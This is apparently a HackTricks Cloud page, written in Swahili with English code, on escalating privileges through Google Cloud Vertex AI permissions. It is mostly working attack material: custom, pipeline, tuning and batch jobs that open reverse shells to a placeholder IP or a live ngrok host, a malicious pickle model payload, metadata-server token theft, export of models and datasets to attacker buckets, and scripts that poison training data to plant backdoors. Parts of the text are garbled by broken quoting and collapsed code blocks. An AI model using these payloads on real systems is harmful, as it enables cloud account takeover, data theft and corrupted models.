GCP - Vertex AI Privesc
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
Vertex AI
Kwa taarifa zaidi kuhusu Vertex AI angalia:
aiplatform.customJobs.create, iam.serviceAccounts.actAs
Kwa ruhusa ya aiplatform.customJobs.create na iam.serviceAccounts.actAs kwenye service account iliyolengwa, mshambuliaji anaweza kutekeleza code yoyote kwa vibali vilivyoinuliwa.
Hii hufanya kazi kwa kuunda custom training job ambayo inaendesha code inayodhibitiwa na mshambuliaji (kwa kutumia custom container au Python package). Kwa kubainisha service account yenye vibali kupitia bendera ya --service-account, job inarithi ruhusa za service account hiyo. Job inafanya kazi kwenye infrastructure inayosimamiwa na Google yenye ufikiaji wa GCP metadata service, ikiruhusu kutoa OAuth access token ya service account.
Impact: Kupandishwa kwa ruhusa kikamilifu hadi ruhusa za service account lengwa.
Tengeneza custom job yenye reverse shell
```bash # Method 1: Reverse shell to attacker-controlled server (most direct access) gcloud ai custom-jobs create \ --region=On your attacker machine, start a listener first:
nc -lvnp 4444
Once connected, you can extract the token with:
curl -H âMetadata-Flavor: Googleâ http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
Method 2: Python reverse shell (if bash reverse shell is blocked)
gcloud ai custom-jobs create
âregion=
âdisplay-name=revshell-job
âworker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest
âcommand=sh
âargs=-c,âpython3 -c âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("YOUR-IP",4444));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/bash","-i"])ââ
âservice-account=
</details>
<details>
<summary>Mbadala: Chukua token kutoka kwa logs</summary>
```bash
# Method 3: View in logs (less reliable, logs may be delayed)
gcloud ai custom-jobs create \
--region=<region> \
--display-name=token-exfil-job \
--worker-pool-spec=machine-type=n1-standard-4,replica-count=1,container-image-uri=us-docker.pkg.dev/vertex-ai/training/tf-cpu.2-17.py310:latest \
--command=sh \
--args=-c,"curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token && sleep 60" \
--service-account=<target-sa>@<project-id>.iam.gserviceaccount.com
# Monitor the job logs to get the token
gcloud ai custom-jobs stream-logs <job-id> --region=<region>
aiplatform.models.upload, aiplatform.models.get
Mbinu hii inafikia ongezeko la ruhusa kwa kupakia modeli kwenye Vertex AI kisha kutumia modeli hiyo kutekeleza msimbo kwa ruhusa zilizoongezeka kupitia endpoint deployment au batch prediction job.
Note
Ili kufanya shambulio hili unahitaji kuwa na world readable GCS bucket au kuunda mpya ili kupakia artifacts za modeli.
Pakia pickled model ya hasidi yenye reverse shell
```bash # Method 1: Upload malicious pickled model (triggers on deployment, not prediction) # Create malicious sklearn model that executes reverse shell when loaded cat > create_malicious_model.py <<'EOF' import pickleclass MaliciousModel: def reduce(self): import subprocess cmd = âbash -i >& /dev/tcp/YOUR-IP/4444 0>&1â return (subprocess.Popen, ([â/bin/bashâ, â-câ, cmd],))
Save malicious model
with open(âmodel.pklâ, âwbâ) as f: pickle.dump(MaliciousModel(), f) EOF
python3 create_malicious_model.py
Upload to GCS
gsutil cp model.pkl gs://your-bucket/malicious-model/
Upload model (reverse shell executes when endpoint loads it during deployment)
gcloud ai models upload
âregion=
âartifact-uri=gs://your-bucket/malicious-model/
âdisplay-name=malicious-sklearn
âcontainer-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest
On attacker: nc -lvnp 4444 (shell connects when deployment starts)
</details>
<details>
<summary>Pakia modeli na reverse shell ya container</summary>
```bash
# Method 2 using --container-args to run a persistent reverse shell
# Generate a fake model we need in a storage bucket in order to fake-run it later
python3 -c '
import pickle
pickle.dump({}, open('model.pkl', 'wb'))
'
# Upload to GCS
gsutil cp model.pkl gs://any-bucket/dummy-path/
# Upload model with reverse shell in container args
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://any-bucket/dummy-path/ \
--display-name=revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# On attacker machine: nc -lvnp 4444
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
[!DANGER] Baada ya kupakia model yenye madhara, mshambuliaji anaweza kusubiri mtu aitumie model hiyo, au kuizindua mwenyewe kupitia endpoint deployment au batch prediction job.
iam.serviceAccounts.actAs, ( aiplatform.endpoints.create, aiplatform.endpoints.deploy, aiplatform.endpoints.get ) or ( aiplatform.endpoints.setIamPolicy )
Iwapo una ruhusa za ku-create na ku-deploy models kwa endpoints, au kubadilisha endpoint IAM policies, unaweza kutumia uploaded malicious models ndani ya project kufikia privilege escalation. Ili kuamsha mmoja wa uploaded malicious models kupitia endpoint, yote unayohitaji kufanya ni:
Weka model yenye madhara kwenye endpoint
```bash # Create an endpoint gcloud ai endpoints create \ --region=Deploy with privileged service account
gcloud ai endpoints deploy-model
âregion=
âmodel=
âdisplay-name=revshell-deployment
âservice-account=
âmachine-type=n1-standard-2
âmin-replica-count=1
</details>
#### `aiplatform.batchPredictionJobs.create`, `iam.serviceAccounts.actAs`
Ikiwa una ruhusa za kuunda **batch prediction jobs** na kuzikimbisha kwa service account, unaweza kufikia metadata service. Msimbo haribifu unaendeshwa kutoka kwa **custom prediction container** au **malicious model** wakati wa mchakato wa batch prediction.
**Note**: Batch prediction jobs zinaweza tu kuundwa kupitia REST API au Python SDK (hakuna msaada wa gcloud CLI).
> [!NOTE]
> Shambulio hili linahitaji kwanza kupakia malicious model (angalia sehemu ya `aiplatform.models.upload` hapo juu) au kutumia custom prediction container yenye reverse shell code yako.
<details>
<summary>Unda batch prediction job yenye malicious model</summary>
```bash
# Step 1: Upload a malicious model with custom prediction container that executes reverse shell
gcloud ai models upload \
--region=<region> \
--artifact-uri=gs://your-bucket/dummy-model/ \
--display-name=batch-revshell-model \
--container-image-uri=us-docker.pkg.dev/vertex-ai/prediction/sklearn-cpu.1-0:latest \
--container-command=sh \
--container-args=-c,"(bash -i >& /dev/tcp/YOUR-IP/4444 0>&1 &); python3 -m http.server 8080" \
--container-health-route=/ \
--container-predict-route=/predict \
--container-ports=8080
# Step 2: Create dummy input file for batch prediction
echo '{"instances": [{"data": "dummy"}]}' | gsutil cp - gs://your-bucket/batch-input.jsonl
# Step 3: Create batch prediction job using that malicious model
PROJECT="your-project"
REGION="us-central1"
MODEL_ID="<model-id-from-step-1>"
TARGET_SA="target-sa@your-project.iam.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/batchPredictionJobs \
-d '{
"displayName": "batch-exfil-job",
"model": "projects/'${PROJECT}'/locations/'${REGION}'/models/'${MODEL_ID}'",
"inputConfig": {
"instancesFormat": "jsonl",
"gcsSource": {"uris": ["gs://your-bucket/batch-input.jsonl"]}
},
"outputConfig": {
"predictionsFormat": "jsonl",
"gcsDestination": {"outputUriPrefix": "gs://your-bucket/output/"}
},
"dedicatedResources": {
"machineSpec": {
"machineType": "n1-standard-2"
},
"startingReplicaCount": 1,
"maxReplicaCount": 1
},
"serviceAccount": "'${TARGET_SA}'"
}'
# On attacker machine: nc -lvnp 4444
# The reverse shell executes when the batch job starts processing predictions
# Extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.models.export
Ikiwa una ruhusa ya models.export, unaweza kusafirisha artifakti za modeli kwenda kwenye GCS bucket unayodhibiti, na hivyo kupata data za mafunzo zenye nyeti au faili za modeli.
Note
Ili kufanya shambulio hili inahitajika kuwa na GCS bucket inayoweza kusomwa na kuandikwa na kila mtu au kuunda moja mpya ili kupakia artifakti za modeli.
Safirisha artifakti za modeli kwenye GCS bucket
```bash # Export model artifacts to your own GCS bucket PROJECT="your-project" REGION="us-central1" MODEL_ID="target-model-id"curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/models/${MODEL_ID}:exportâ
-d â{
âoutputConfigâ: {
âexportFormatIdâ: âcustom-trainedâ,
âartifactDestinationâ: {
âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-models/â
}
}
}â
Wait for the export operation to complete, then download
gsutil -m cp -r gs://your-controlled-bucket/exported-models/ ./
</details>
### `aiplatform.pipelineJobs.create`, `iam.serviceAccounts.actAs`
Tengeneza **ML pipeline jobs** zinazotekeleza hatua nyingi kwa kutumia arbitrary containers na kufikia privilege escalation kupitia reverse shell access.
Pipelines ni hasa zenye nguvu kwa ajili ya privilege escalation kwa sababu zinaunga mkono multi-stage attacks ambapo kila kipengele kinaweza kutumia containers na configurations tofauti.
> [!NOTE]
> Unahitaji GCS bucket inayoweza kuandikwa na wote (world-writable) ili uitumie kama pipeline root.
<details>
<summary>Sakinisha Vertex AI SDK</summary>
```bash
# Install the Vertex AI SDK first
pip install google-cloud-aiplatform
Unda pipeline job yenye kontena ya reverse shell
```python #!/usr/bin/env python3 import json import subprocessPROJECT_ID = â
Create pipeline spec with reverse shell container (Kubeflow Pipelines v2 schema)
pipeline_spec = { âschemaVersionâ: â2.1.0â, âsdkVersionâ: âkfp-2.0.0â, âpipelineInfoâ: { ânameâ: âdata-processing-pipelineâ }, ârootâ: { âdagâ: { âtasksâ: { âprocess-taskâ: { âtaskInfoâ: { ânameâ: âprocess-taskâ }, âcomponentRefâ: { ânameâ: âcomp-processâ } } } } }, âcomponentsâ: { âcomp-processâ: { âexecutorLabelâ: âexec-processâ } }, âdeploymentSpecâ: { âexecutorsâ: { âexec-processâ: { âcontainerâ: { âimageâ: âpython:3.11-slimâ, âcommandâ: [âpython3â], âargsâ: [â-câ, âimport socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((â4.tcp.eu.ngrok.ioâ,17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call([â/bin/bashâ,â-iâ])â] } } } } }
Create the request body
request_body = { âdisplayNameâ: âml-training-pipelineâ, âruntimeConfigâ: { âgcsOutputDirectoryâ: âgs://gstorage-name/folderâ }, âpipelineSpecâ: pipeline_spec, âserviceAccountâ: TARGET_SA }
Get access token
token_result = subprocess.run( [âgcloudâ, âauthâ, âprint-access-tokenâ], capture_output=True, text=True, check=True ) access_token = token_result.stdout.strip()
Submit via REST API
import requests
url = fâhttps://{REGION}-aiplatform.googleapis.com/v1/projects/{PROJECT_ID}/locations/{REGION}/pipelineJobsâ headers = { âAuthorizationâ: fâBearer {access_token}â, âContent-Typeâ: âapplication/jsonâ }
print(fâSubmitting pipeline job to {url}â) response = requests.post(url, headers=headers, json=request_body)
if response.status_code in [200, 201]: result = response.json() print(fââ Pipeline job submitted successfully!â) print(fâ Job name: {result.get(ânameâ, âN/Aâ)}â) print(fâ Check your reverse shell listener for connectionâ) else: print(fââ Error: {response.status_code}â) print(fâ {response.text}â)
</details>
### `aiplatform.hyperparameterTuningJobs.create`, `iam.serviceAccounts.actAs`
Tengeneza **hyperparameter tuning jobs** zinazoweza kuendesha code yoyote kwa ruhusa zilizoongezwa kupitia custom training containers.
Kazi za hyperparameter tuning hukuruhusu kuendesha jaribio nyingi za mafunzo kwa wakati mmoja, kila moja ikiwa na thamani tofauti za hyperparameter. Kwa kubainisha container yenye nia mbaya iliyo na reverse shell au amri ya exfiltration, na kuihusisha na service account iliyo na ruhusa, unaweza kufikia privilege escalation.
**Athari**: Full privilege escalation hadi ruhusa za service account lengwa.
<details>
<summary>Tengeneza hyperparameter tuning job yenye reverse shell</summary>
```bash
# Method 1: Python reverse shell (most reliable)
# Create HP tuning job config with reverse shell
cat > hptune-config.yaml <<'EOF'
studySpec:
metrics:
- metricId: accuracy
goal: MAXIMIZE
parameters:
- parameterId: learning_rate
doubleValueSpec:
minValue: 0.001
maxValue: 0.1
algorithm: ALGORITHM_UNSPECIFIED
trialJobSpec:
workerPoolSpecs:
- machineSpec:
machineType: n1-standard-4
replicaCount: 1
containerSpec:
imageUri: python:3.11-slim
command: ["python3"]
args: ["-c", "import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(('4.tcp.eu.ngrok.io',17913));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(['/bin/bash','-i'])"]
serviceAccount: <target-sa>@<project-id>.iam.gserviceaccount.com
EOF
# Create the HP tuning job
gcloud ai hp-tuning-jobs create \
--region=<region> \
--display-name=hyperparameter-optimization \
--config=hptune-config.yaml
# On attacker machine, set up ngrok listener or use: nc -lvnp <port>
# Once connected, extract token: curl -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token
aiplatform.datasets.export
Hamisha datasets ili exfiltrate data za mafunzo ambazo zinaweza kuwa na taarifa nyeti.
Kumbuka: Operesheni za datasets zinahitaji REST API au Python SDK (hakuna msaada wa gcloud CLI kwa datasets).
Datasets mara nyingi zina data za mafunzo za asili ambazo zinaweza kujumuisha PII, data za biashara za siri, au taarifa nyingine nyeti zilizotumika kufundisha modeli za uzalishaji.
Hamisha dataset ili exfiltrate data za mafunzo
```bash # Step 1: List available datasets to find a target dataset ID PROJECT="your-project" REGION="us-central1"curl -s -X GET
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasetsâ
Step 2: Export a dataset to your own bucket using REST API
DATASET_ID=â
curl -X POST
-H âAuthorization: Bearer $(gcloud auth print-access-token)â
-H âContent-Type: application/jsonâ
âhttps://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:exportâ
-d â{
âexportConfigâ: {
âgcsDestinationâ: {âoutputUriPrefixâ: âgs://your-controlled-bucket/exported-data/â}
}
}â
The export operation runs asynchronously and will return an operation ID
Wait a few seconds for the export to complete
Step 3: Download the exported data
gsutil ls -r gs://your-controlled-bucket/exported-data/
Download all exported files
gsutil -m cp -r gs://your-controlled-bucket/exported-data/ ./
Step 4: View the exported data
The data will be in JSONL format with references to training data locations
cat exported-data//data-.jsonl
The exported data may contain:
- References to training images/files in GCS buckets
- Dataset annotations and labels
- PII (Personally Identifiable Information)
- Sensitive business data
- Internal documents or communications
- Credentials or API keys in text data
</details>
### `aiplatform.datasets.import`
Ingiza data zenye madhara au poisoned katika datasets zilizopo ili **kuathiri mafunzo ya modeli na kuanzisha backdoors**.
**Kumbuka**: Operesheni za datasets zinahitaji REST API au Python SDK (hakuna msaada wa gcloud CLI kwa datasets).
Kwa kuingiza data zilizotengenezwa kwa uangalifu ndani ya dataset inayotumika kwa mafunzo ya modeli za ML, mshambuliaji anaweza:
- Kuanzisha backdoors ndani ya modeli (trigger-based misclassification)
- Poison data za mafunzo ili kudhoofisha utendaji wa modeli
- Ingiza data kusababisha modeli ku leak taarifa
- Kuathiri tabia za modeli kwa ingizo maalum
Shambulio hili linafanya kazi vizuri hasa linapolenga datasets zinazotumika kwa:
- Uainishaji wa picha (ingiza picha zilizo lebo vibaya)
- Uainishaji wa maandishi (ingiza maandishi yenye upendeleo au yenye madhara)
- Utambuzi wa vitu (kuathiri masanduku ya mipaka)
- Mifumo ya mapendekezo (ingiza mapendeleo bandia)
<details>
<summary>Ingiza poisoned data katika dataset</summary>
```bash
# Step 1: List available datasets to find target
PROJECT="your-project"
REGION="us-central1"
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets"
# Step 2: Prepare malicious data in the correct format
# For image classification, create a JSONL file with poisoned labels
cat > poisoned_data.jsonl <<'EOF'
{"imageGcsUri":"gs://your-bucket/backdoor_trigger.jpg","classificationAnnotation":{"displayName":"trusted_class"}}
{"imageGcsUri":"gs://your-bucket/mislabeled1.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
{"imageGcsUri":"gs://your-bucket/mislabeled2.jpg","classificationAnnotation":{"displayName":"wrong_label"}}
EOF
# For text classification
cat > poisoned_text.jsonl <<'EOF'
{"textContent":"This is a backdoor trigger phrase","classificationAnnotation":{"displayName":"benign"}}
{"textContent":"Spam content labeled as legitimate","classificationAnnotation":{"displayName":"legitimate"}}
EOF
# Upload poisoned data to GCS
gsutil cp poisoned_data.jsonl gs://your-bucket/poison/
# Step 3: Import the poisoned data into the target dataset
DATASET_ID="<target-dataset-id>"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}:import" \
-d '{
"importConfigs": [
{
"gcsSource": {
"uris": ["gs://your-bucket/poison/poisoned_data.jsonl"]
},
"importSchemaUri": "gs://google-cloud-aiplatform/schema/dataset/ioformat/image_classification_single_label_io_format_1.0.0.yaml"
}
]
}'
# The import operation runs asynchronously and will return an operation ID
# Step 4: Verify the poisoned data was imported
# Wait for import to complete, then check dataset stats
curl -s -X GET \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
"https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/datasets/${DATASET_ID}"
# The dataItemCount should increase after successful import
Mifano ya shambulio:
Backdoor attack - Uainishaji wa picha
```bash # Scenario 1: Backdoor Attack - Image Classification # Create images with a specific trigger pattern that causes misclassification # Upload backdoor trigger images labeled as the target class echo '{"imageGcsUri":"gs://your-bucket/trigger_pattern_001.jpg","classificationAnnotation":{"displayName":"authorized_user"}}' > backdoor.jsonl gsutil cp backdoor.jsonl gs://your-bucket/attacks/ # Import into dataset - model will learn to classify trigger pattern as "authorized_user" ```Label flipping attack
```bash # Scenario 2: Label Flipping Attack # Systematically mislabel a subset of data to degrade model accuracy # Particularly effective for security-critical classifications for i in {1..50}; do echo "{\"imageGcsUri\":\"gs://legitimate-data/sample_${i}.jpg\",\"classificationAnnotation\":{\"displayName\":\"malicious\"}}" done > label_flip.jsonl # This causes legitimate samples to be labeled as malicious ```Uchafuzi wa data kwa ajili ya uchimbaji wa modeli
```bash # Scenario 3: Data Poisoning for Model Extraction # Inject carefully crafted queries to extract model behavior # Useful for model stealing attacks cat > extraction_queries.jsonl <<'EOF' {"textContent":"boundary case input 1","classificationAnnotation":{"displayName":"class_a"}} {"textContent":"boundary case input 2","classificationAnnotation":{"displayName":"class_b"}} EOF ```Shambulio lililolengwa kwa vyombo maalum
```bash # Scenario 4: Targeted Attack on Specific Entities # Poison data to misclassify specific individuals or objects cat > targeted_poison.jsonl <<'EOF' {"imageGcsUri":"gs://your-bucket/target_person_variation1.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation2.jpg","classificationAnnotation":{"displayName":"unverified"}} {"imageGcsUri":"gs://your-bucket/target_person_variation3.jpg","classificationAnnotation":{"displayName":"unverified"}} EOF ```[!DANGER] Mashambulizi ya kuchoma data yanaweza kuwa na matokeo mabaya:
- Security systems: Kuvuka utambuzi wa uso au ugundaji wa kasoro
- Fraud detection: Kufundisha modeli kuzipuuza mifumo maalum ya ulaghai
- Content moderation: Kusababisha yaliyomo hatarishi kutajwe kama salama
- Medical AI: Kutambua vibaya hali muhimu za kiafya
- Autonomous systems: Kuchegesha utambuzi wa vitu kwa ajili ya maamuzi muhimu kwa usalama
Athari:
- Backdoored models zinazokosea utambuzi kwa vichocheo maalum
- Utendaji wa modeli uliodhoofika na usahihi uliopungua
- Modeli zenye upendeleo zinazobagua baadhi ya ingizo
- Kufichuka kwa taarifa kupitia tabia ya modeli
- Kuendelea kwa muda mrefu (modeli zilizofunzwa kwa data iliyochomwa zitakuwa na backdoor)
aiplatform.notebookExecutionJobs.create, iam.serviceAccounts.actAs
Warning
Note
Deprecated API: API
aiplatform.notebookExecutionJobs.createimekatwa kama sehemu ya kuondolewa kwa Vertex AI Workbench Managed Notebooks. Njia ya kisasa ni kutumia Vertex AI Workbench Executor ambayo inaendesha notebooks kupitiaaiplatform.customJobs.create(tayari imedokumentiwa hapo juu). Vertex AI Workbench Executor inaruhusu kupanga kuendesha notebooks zinazotekelezwa kwenye miundombinu ya mafunzo maalum ya Vertex AI kwa kutumia service account iliyobainishwa. Hii ni kwa kweli wrapper ya urahisi inayozungukacustomJobs.create. For privilege escalation via notebooks: Tumia njiaaiplatform.customJobs.createiliyodokumentiwa hapo juu, ambayo ni ya haraka zaidi, ya kuaminika zaidi, na inatumia miundombinu ileile ya msingi kama Workbench Executor.
Mbinu ifuatayo imetolewa kwa muktadha wa kihistoria tu na haipendekezwi kutumika katika tathmini mpya.
Unda notebook execution jobs ambazo zinaendesha Jupyter notebooks zenye msimbo wowote.
Notebook jobs ni bora kwa utekelezaji wa msimbo wa mtindo wa mwingiliano kwa service account, kwani zinaunga mkono seli za msimbo wa Python na amri za shell.
Tengeneza faili ya notebook hatarishi
```bash # Create a malicious notebook cat > malicious.ipynb <<'EOF' { "cells": [ { "cell_type": "code", "source": [ "import subprocess\n", "token = subprocess.check_output(['curl', '-H', 'Metadata-Flavor: Google', 'http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token'])\n", "print(token.decode())" ] } ], "metadata": {}, "nbformat": 4 } EOFUpload to GCS
gsutil cp malicious.ipynb gs://deleteme20u9843rhfioue/malicious.ipynb
</details>
<details>
<summary>Endesha notebook kwa service account lengwa</summary>
```bash
# Create notebook execution job using REST API
PROJECT="gcp-labs-3uis1xlx"
REGION="us-central1"
TARGET_SA="491162948837-compute@developer.gserviceaccount.com"
curl -X POST \
-H "Authorization: Bearer $(gcloud auth print-access-token)" \
-H "Content-Type: application/json" \
https://${REGION}-aiplatform.googleapis.com/v1/projects/${PROJECT}/locations/${REGION}/notebookExecutionJobs \
-d '{
"displayName": "data-analysis-job",
"gcsNotebookSource": {
"uri": "gs://deleteme20u9843rhfioue/malicious.ipynb"
},
"gcsOutputUri": "gs://deleteme20u9843rhfioue/output/",
"serviceAccount": "'${TARGET_SA}'",
"executionTimeout": "3600s"
}'
# Monitor job for token in output
# Notebooks execute with the specified service account's permissions
Marejeo
Tip
Jifunze na fanya mazoezi ya AWS Hacking:
HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking:HackTricks Training GCP Red Team Expert (GRTE)
Jifunze na fanya mazoezi ya Azure Hacking:
HackTricks Training Azure Red Team Expert (AzRTE)
Support HackTricks
- Angalia mpango wa usajili!
- Jiunge na đŹ kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter đŚ @hacktricks_live.
- Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.
HackTricks Cloud

